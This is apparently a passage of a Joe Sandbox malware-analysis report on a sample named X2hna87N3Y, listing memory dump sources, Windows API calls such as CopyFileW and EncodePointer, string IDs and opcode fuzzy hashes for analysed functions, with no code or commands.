                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2744216297-0
                                                                                                                  • Opcode ID: ff87bc1180fd93343d2c024f373391b42f2dbd77685d9fb7efde3242f948296e
                                                                                                                  • Instruction ID: d1482df3acc6bb2ec2d125b974bf6961d6c52d8d355d204a39f084ecc8380053
                                                                                                                  • Opcode Fuzzy Hash: ff87bc1180fd93343d2c024f373391b42f2dbd77685d9fb7efde3242f948296e
                                                                                                                  • Instruction Fuzzy Hash: E0F03736401224FBCF222F91DC0999A3F65FB453A0F088110FA19D5270CB31C960ABB5
                                                                                                                  APIs
                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00D8C379
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D8C388
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00D8C391
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00D8C39E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2933794660-0
                                                                                                                  • Opcode ID: 2b2485e3fc964bd3f789f4cc80d63e29397a9fec69c95ddd97ab76b796f949cd
                                                                                                                  • Instruction ID: 651b8a81d28880dda7113d606df3e4969a4ded15de8de3af887734c4930399d2
                                                                                                                  • Opcode Fuzzy Hash: 2b2485e3fc964bd3f789f4cc80d63e29397a9fec69c95ddd97ab76b796f949cd
                                                                                                                  • Instruction Fuzzy Hash: B4F05F74D1120DEBCF00EBB5DA4999FBBF4FF1C204B914695A412F6211EA30AB449FA0
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _strcspn
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 3709121408-2766056989
                                                                                                                  • Opcode ID: b3834b310364707216ac988f29d8c5b1f765637a499ede48f237de3398570bc3
                                                                                                                  • Instruction ID: f18b8f625ecda85b3788d69dc424d342c52059ea92747f7d63b77b58885694d4
                                                                                                                  • Opcode Fuzzy Hash: b3834b310364707216ac988f29d8c5b1f765637a499ede48f237de3398570bc3
                                                                                                                  • Instruction Fuzzy Hash: 7432C5B4904269CFCB14EF64C981AADFBF1BF48310F15859AE849A7351D730AE85CFA1
                                                                                                                  APIs
                                                                                                                  • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00D96CFF,?,?,00000000,00000000,00000000,?), ref: 00D96E23
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EncodePointer
                                                                                                                  • String ID: MOC$RCC
                                                                                                                  • API String ID: 2118026453-2084237596
                                                                                                                  • Opcode ID: c17430ee02fe9d6bfe24046c28be631c24eecee0899a246d84063f41ef836e10
                                                                                                                  • Instruction ID: 732b35ea4839a1986fab29ed6cbd1ca2de4d4a310616efba67207408725eddbe
                                                                                                                  • Opcode Fuzzy Hash: c17430ee02fe9d6bfe24046c28be631c24eecee0899a246d84063f41ef836e10
                                                                                                                  • Instruction Fuzzy Hash: 5D412672900209EFCF16DF98D981AAEBBB5FF48304F198199FA04A7221D335E950DB70
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitVariant
                                                                                                                  • String ID: N$]
                                                                                                                  • API String ID: 1927566239-1635235127
                                                                                                                  • Opcode ID: 42458be4833a2921109a7d9e437a2205c0d69bb37ad24b2d8f5f3fe68557ffee
                                                                                                                  • Instruction ID: 4e5ae970ecd199c33ea546fe262ad0416e9955d009ac5c95d912acbed433464f
                                                                                                                  • Opcode Fuzzy Hash: 42458be4833a2921109a7d9e437a2205c0d69bb37ad24b2d8f5f3fe68557ffee
                                                                                                                  • Instruction Fuzzy Hash: 0C41387150C7C18AD325CB38845878FBFD16BE6314F498AACE5E54B3E2DA798405CB63
                                                                                                                  APIs
                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00D968E1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ___except_validate_context_record
                                                                                                                  • String ID: csm$csm
                                                                                                                  • API String ID: 3493665558-3733052814
                                                                                                                  • Opcode ID: 446aeefaa0ef215a3e5712bacec80f59d68d3fcfd97602c0f1c7c327e59c9103
                                                                                                                  • Instruction ID: e6d5fdfc286cd8ef581cfc420e46366b103a9c4accd5b8f2eff10e453ec4eb2c
                                                                                                                  • Opcode Fuzzy Hash: 446aeefaa0ef215a3e5712bacec80f59d68d3fcfd97602c0f1c7c327e59c9103
                                                                                                                  • Instruction Fuzzy Hash: 3531C432400219FBCF269F54CD44A6A7B66FF09315B1C826AF9944A121D332DCA1DFB1
                                                                                                                  APIs
                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0042646E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CopyFile
                                                                                                                  • String ID: *$*
                                                                                                                  • API String ID: 1304948518-3771216468
                                                                                                                  • Opcode ID: b3c70e620b2a5bffc9ee9673ef11ef18317e07b739a38a59847c99a1fa5a8965
                                                                                                                  • Instruction ID: 3e6526b6d9ae425b3e8d6a86e634f6df26a0ebb4ad7d9e737430cc0399b070e8
                                                                                                                  • Opcode Fuzzy Hash: b3c70e620b2a5bffc9ee9673ef11ef18317e07b739a38a59847c99a1fa5a8965
                                                                                                                  • Instruction Fuzzy Hash: B82166B9910711EFC310AF36DC09712BBB1BF4A701F119A68E0419BA44E738E661CBC9